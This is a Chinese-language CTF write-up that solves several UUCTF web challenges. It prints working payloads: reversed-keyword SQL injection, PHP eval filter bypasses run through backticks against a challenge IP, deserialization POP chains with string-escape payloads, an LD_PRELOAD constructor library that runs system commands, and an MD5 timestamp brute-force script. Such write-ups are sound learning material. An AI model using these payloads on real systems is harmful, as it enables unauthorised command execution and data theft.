ezsql

这里就是把我们的语句全部倒序了,然后过滤双写绕过即可

#"FTCUU"=amehcs_elbat erehw selbat.amehcs_noitamrofni moorrf)eman_elbat(tacnoc_puoorrg,1 tceles noinu)'(   查表

#"galf"=eman_elbat dna "FTCUU"=amehcs_elbat erehw snmuloc.amehcs_noitamrofni moorrf)eman_nmuloc(tacnoc_puoorrg,1 tceles noinu)'(  查列

查数据

#galf moorrf))FTCUU,'~'(sw_tacnoc(tacnoc_puoorrg,1 tceles noinu)'(

phonecode

看题目提示下一次必定命中,然后输入手机号。

只有改变手机号然后给我们的hint才会改变。这里猜测就是伪随机数。进行爆破即可

这几个都试试

发现是2820130815这个种子

将得到的验证码输入即可获取flag

ez_unser

傻逼了,这道题的wakeup不能绕。

<?php
show_source(__FILE__);

###very___so___easy!!!!
class test{
    public $a;
    public $b;
    public $c;
    public function __construct(){
        $this->a=1;
        $this->b=2;
        $this->c=3;
    }
    public function __wakeup(){
        $this->a='';
    }
    public function __destruct(){
        $this->b=$this->c;
        eval($this->a);
    }
}
$a=$_GET['a'];
if(!preg_match('/test":3/i',$a)){
    die("你输入的不正确!!!搞什么!!");
}
$bbb=unserialize($_GET['a']);

这里正则很简单,只需要加数据匹配即可。

然后这里版本5.6.28不能绕wakeup 但是这里给了三个变量,而且在__destruct当中还有一个赋值的操作。然后这里其实就可以想到引用了。

让b引用a 然后a置空后 c给b赋值其实也改变了a

<?php
show_source(__FILE__);

###very___so___easy!!!!
class test{
    public $a;
    public $b;
    public $c;
    public function __construct(){
        $this->a='test":3';
        $this->b = &$this->a;
        $this->c = "system('ls /');";
    }
}

echo serialize(new test());

ez_rce

居然都不输入参数,可恶!!!!!!!!!

<?php
## 放弃把,小伙子,你真的不会RCE,何必在此纠结呢????????????
if(isset($_GET['code'])){
    $code=$_GET['code'];
    if (!preg_match('/sys|pas|read|file|ls|cat|tac|head|tail|more|less|php|base|echo|cp|\$|\*|\+|\^|scan|\.|local|current|chr|crypt|show_source|high|readgzfile|dirname|time|next|all|hex2bin|im|shell/i',$code)){
        echo '看看你输入的参数!!!不叫样子!!';echo '<br>';
        eval($code);
    }
    else{
        die("你想干什么?????????");
    }
}
else{
    echo "居然都不输入参数,可恶!!!!!!!!!";
    show_source(__FILE__);
}

过滤的比较少,这里可以用转义符绕过关键字

这里可以用反引号执行命令然后输出可以使用print_r或者var_dump等

http://43.143.7.97:28824/?code=var_dump(`l\s%09/`);

http://43.143.7.97:28824/?code=var_dump(`c\at%09/fffffffffflagafag`);

uploadandinject

在hint.php内看到提示 .index.php.swp

下载还原。

很熟悉哈,环境变量注入。

LD_PRELOAD是Linux系统的一个环境变量,它可以影响程序的运行时的链接(Runtime linker),它允许你定义在程序运行前优先加载的动态链接库。这个功能主要就是用来有选择性的载入不同动态链接库中的相同函数。通过这个环境变量,我们可以在主程序和其动态链接库的中间加载别的动态链接库,甚至覆盖正常的函数库。一方面,我们可以以此功能来使用自己的或是更好的函数(无需别人的源码),而另一方面,我们也可以以向别人的程序注入程序,从而达到特定的目的。

用人话讲,LD_PRELOAD,是个环境变量,用于动态库的加载,而动态库加载的优先级最高,因此我们可以抢先在正常函数执行之前率先执行我们的用代码写的函数。

这里的话参考p牛的一句话。

我是如何利用环境变量注入执行任意命令 - 跳跳糖 (tttang.com)

在有上传点(无需控制文件名)的情况下,这段代码其实比较简单了,可以直接用LD_PRELOAD搞定。上传一个文件名不限的so文件,如hj.jpg,可以通过LD_PRELOAD=/var/www/html/uploads/hj.jpg这样的方法劫持并执行任意代码。

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

__attribute__ ((__constructor__)) void preload (void){
  unsetenv("LD_PRELOAD");
  system("id");
  system("ls /");
}

编译so文件

gcc -shared -fPIC exp.c -o exp.so

然后更改文件后缀

上传,这里扫描目录扫描到了 /upload/upload.php

然后在首页加载文件即可。

然后修改c文件的内容再编译重复步骤即可。

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

__attribute__ ((__constructor__)) void preload (void){
  unsetenv("LD_PRELOAD");
  system("id");
  system("cat /flag");
}

ezpop

<?php
//flag in flag.php
error_reporting(0);
class UUCTF{
    public $name,$key,$basedata,$ob;
    function __construct($str){
        $this->name=$str;
    }
    function __wakeup(){
    if($this->key==="UUCTF"){
            $this->ob=unserialize(base64_decode($this->basedata));
        }
        else{
            die("oh!you should learn PHP unserialize String escape!");
        }
    }
}
class output{
    public $a;
    function __toString(){
        $this->a->rce();
    }
}
class nothing{
    public $a;
    public $b;
    public $t;
    function __wakeup(){
        $this->a="";
    }
    function __destruct(){
        $this->b=$this->t;
        die($this->a);
    }
}
class youwant{
    public $cmd;
    function rce(){
        eval($this->cmd);
    }
}
$pdata=$_POST["data"];
if(isset($pdata))
{
    $data=serialize(new UUCTF($pdata));
    $data_replace=str_replace("hacker","loveuu!",$data);
    unserialize($data_replace);
}else{
    highlight_file(__FILE__);
}
?>

这里是增加类型。$this->key==="UUCTF" 我们需要满足这个条件。那么需要逃逸";s:3:"key";s:5:"UUCTF";}

前面闭合后面闭合。这里需要逃逸25个字符那么就需要25个hacker,但是别忘了!这里属性是四个,所以还需要把后面两个属性逃逸。

";s:3:"key";s:5:"UUCTF";s:8:"basedata";N;s:2:"ob";N;}  一共53个字符。

后续构造pop链

<?php

class UUCTF
{
    public $db;
    public $ob;



    public function __wakeup()
    {
        // TODO: Implement __wakeup() method.
        $this->ob=unserialize(base64_decode($this->db));
    }
}


class nothing{
    public $a;
    public $b;
    public $t;
    function __wakeup(){
        $this->a="";
    }
    function __destruct(){
        $this->b=$this->t;
        die($this->a);
    }
}


//class nothing{
//    public $a;
//    public $b;
//    public $t;
//    public function __construct()
//    {
//        $this->a = "aaa";
//        $this->b = &$this->a;
//        $this->t = new output();
//    }
//}


class output{
    public $a;

    public function __construct()
    {
        $this->a = new youwant();
    }

    function __toString(){
        $this->a->rce();
    }
}

class youwant{
    public $cmd;

    public function __construct()
    {
        $this->cmd = "phpinfo();";
    }

    function rce(){
        eval($this->cmd);
    }
}

$u = new UUCTF();
$u->db = base64_encode('O:7:"nothing":3:{s:1:"a";s:3:"aaa";s:1:"b";R:2;s:1:"t";O:6:"output":1:{s:1:"a";O:7:"youwant":1:{s:3:"cmd";s:10:"phpinfo();";}}}');
echo serialize($u);
class:UUCTF::__wakeup->class:nothing::__destruct->class:output::__toString->class:youwant::rce();

注意这里的代码

if($this->key==="UUCTF"){
            $this->ob=unserialize(base64_decode($this->basedata));
        }
这里需要我们先逃逸出key属性  然后再反序列化basedata属性,这里还有base64编码
$u->db = base64_encode('O:7:"nothing":3:{s:1:"a";s:3:"aaa";s:1:"b";R:2;s:1:"t";O:6:"output":1:{s:1:"a";O:7:"youwant":1:{s:3:"cmd";s:10:"phpinfo();";}}}');
我们需要构造的basedata属性值

然后把需要逃逸的写一下

$str = '";s:3:"key";s:5:"UUCTF";s:8:"basedata";s:172:"Tzo3OiJub3RoaW5nIjozOntzOjE6ImEiO3M6MzoiYWFhIjtzOjE6ImIiO1I6MjtzOjE6InQiO086Njoib3V0cHV0IjoxOntzOjE6ImEiO086NzoieW91d2FudCI6MTp7czozOiJjbWQiO3M6MTA6InBocGluZm8oKTsiO319fQ==";s:2:"ob";N;}';
var_dump($str);
data=hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker";s:3:"key";s:5:"UUCTF";s:8:"basedata";s:172:"Tzo3OiJub3RoaW5nIjozOntzOjE6ImEiO3M6MzoiYWFhIjtzOjE6ImIiO1I6MjtzOjE6InQiO086Njoib3V0cHV0IjoxOntzOjE6ImEiO086NzoieW91d2FudCI6MTp7czozOiJjbWQiO3M6MTA6InBocGluZm8oKTsiO319fQ==";s:2:"ob";N;}

image-20221024215300434

data=hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker";s:3:"key";s:5:"UUCTF";s:8:"basedata";s:176:"Tzo3OiJub3RoaW5nIjozOntzOjE6ImEiO3M6MzoiYWFhIjtzOjE6ImIiO1I6MjtzOjE6InQiO086Njoib3V0cHV0IjoxOntzOjE6ImEiO086NzoieW91d2FudCI6MTp7czozOiJjbWQiO3M6MTM6InN5c3RlbSgnbHMnKTsiO319fQ==";s:2:"ob";N;}

<?php

class UUCTF
{
    public $db;
    public $ob;



    public function __wakeup()
    {
        // TODO: Implement __wakeup() method.
        $this->ob=unserialize(base64_decode($this->db));
    }
}


//class nothing{
//    public $a;
//    public $b;
//    public $t;
//    function __wakeup(){
//        $this->a="";
//    }
//    function __destruct(){
//        $this->b=$this->t;
//        die($this->a);
//    }
//}


class nothing{
    public $a;
    public $b;
    public $t;
    public function __construct()
    {
        $this->a = "aaa";
        $this->b = &$this->a;
        $this->t = new output();
    }
}


class output{
    public $a;

    public function __construct()
    {
        $this->a = new youwant();
    }

    function __toString(){
        $this->a->rce();
    }
}

class youwant{
    public $cmd;

    public function __construct()
    {
        $this->cmd = "system('ls');";
    }

    function rce(){
        eval($this->cmd);
    }
}

$u = new UUCTF();
$n = new nothing();
echo serialize($n);
var_dump(base64_encode('O:7:"nothing":3:{s:1:"a";s:3:"aaa";s:1:"b";R:2;s:1:"t";O:6:"output":1:{s:1:"a";O:7:"youwant":1:{s:3:"cmd";s:13:"system(\'ls\');";}}}'));
//$u->db = base64_encode('O:7:"nothing":3:{s:1:"a";s:3:"aaa";s:1:"b";R:2;s:1:"t";O:6:"output":1:{s:1:"a";O:7:"youwant":1:{s:3:"cmd";s:10:"phpinfo();";}}}');
//echo serialize($u);
//unserialize('O:5:"UUCTF":2:{s:2:"db";s:172:"Tzo3OiJub3RoaW5nIjozOntzOjE6ImEiO3M6MzoiYWFhIjtzOjE6ImIiO1I6MjtzOjE6InQiO086Njoib3V0cHV0IjoxOntzOjE6ImEiO086NzoieW91d2FudCI6MTp7czozOiJjbWQiO3M6MTA6InBocGluZm8oKTsiO319fQ==";s:2:"ob";N;}');
//


<?php

$str = '";s:3:"key";s:5:"UUCTF";s:8:"basedata";s:176:"Tzo3OiJub3RoaW5nIjozOntzOjE6ImEiO3M6MzoiYWFhIjtzOjE6ImIiO1I6MjtzOjE6InQiO086Njoib3V0cHV0IjoxOntzOjE6ImEiO086NzoieW91d2FudCI6MTp7czozOiJjbWQiO3M6MTM6InN5c3RlbSgnbHMnKTsiO319fQ==";s:2:"ob";N;}';
var_dump($str);
data=hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker";s:3:"key";s:5:"UUCTF";s:8:"basedata";s:188:"Tzo3OiJub3RoaW5nIjozOntzOjE6ImEiO3M6MzoiYWFhIjtzOjE6ImIiO1I6MjtzOjE6InQiO086Njoib3V0cHV0IjoxOntzOjE6ImEiO086NzoieW91d2FudCI6MTp7czozOiJjbWQiO3M6MjM6InN5c3RlbSgnY2F0IGZsYWcucGhwJyk7Ijt9fX0=";s:2:"ob";N;}

image-20221024210516911

ez_upload

看了一下是apache 不能传htaccess .user.ini的条件也不满足。继续测试发现就是多后缀即可。

backdoor

布里茨贼猛

想到是机器人

查看robots.txt

提示www.zip

后面不会了····

funmd5

<?php
error_reporting(0);
include "flag.php";
$time=time();
$guessmd5=md5($time);  //获取时间戳对其进行md5加密
$md5=$_GET["md5"];
if(isset($md5)){
    $sub=substr($time,-1);   //取时间戳最后一位
    $md5=preg_replace('/^(.*)0e(.*)$/','${1}no_science_notation!${2}',$md5);  //对0e两边的内容进行正则匹配替换到${1}no_science_notation!${2} 这里。这里我们需要绕过,因为没有多行匹配。我们加一个换行即可
    if(preg_match('/0e/',$md5[0])){
        //这里可以匹配到
        $md5[0]=substr($md5[0],$sub);  //通过上面得到的数字进行截取,这里比如要找一个0e开头的且MD5值也是0e开头的值。  然后后面是我们需要传入md5值的和时间戳的相等,这里我们穿的时候就需要注意传过去接收到已经不同了,所以我们要提交两秒
        if($md5[0]==md5($md5[0])&&$md5[1]===$guessmd5){
            echo "well!you win again!now flag is yours.<br>";
            echo $flag;
        }
        else{
            echo $md5[0];
            echo "oh!no!maybe you need learn more PHP!";
        }
    }
    else{
        echo "this is your md5:$md5[0]<br>";
        echo "maybe you need more think think!";
    }
}
else{
    highlight_file(__FILE__);
    $sub=strlen($md5[0]);
    echo substr($guessmd5,0,5)."<br>";
    echo "plase give me the md5!";
}
?>
2fff5
plase give me the md5!

编写脚本发送即可。这里要看我们自己的网络延迟了,我这里测试大概两秒左右。

# @Time : 2022/10/25 12:20
# @Author : xiaoqiuxx
# @File : funmd5.py
# @Team : 少年游
import time
import requests
import hashlib


//这里0e215962017   它md5加密后开头还是0e  前面加个%0a是绕正则  还有个1是为了方便截取。

for i in range(10000):
    times = int(time.time())+2
    print(times)
    times = hashlib.md5(str(times).encode("utf-8")).hexdigest()
    url = f'http://43.143.7.97:28015/?md5[0]=%0a10e215962017&md5[1]={times}'
    resp = requests.get(url=url)
    if "flag" in resp.text:
        print(resp.url)
        print(resp.text)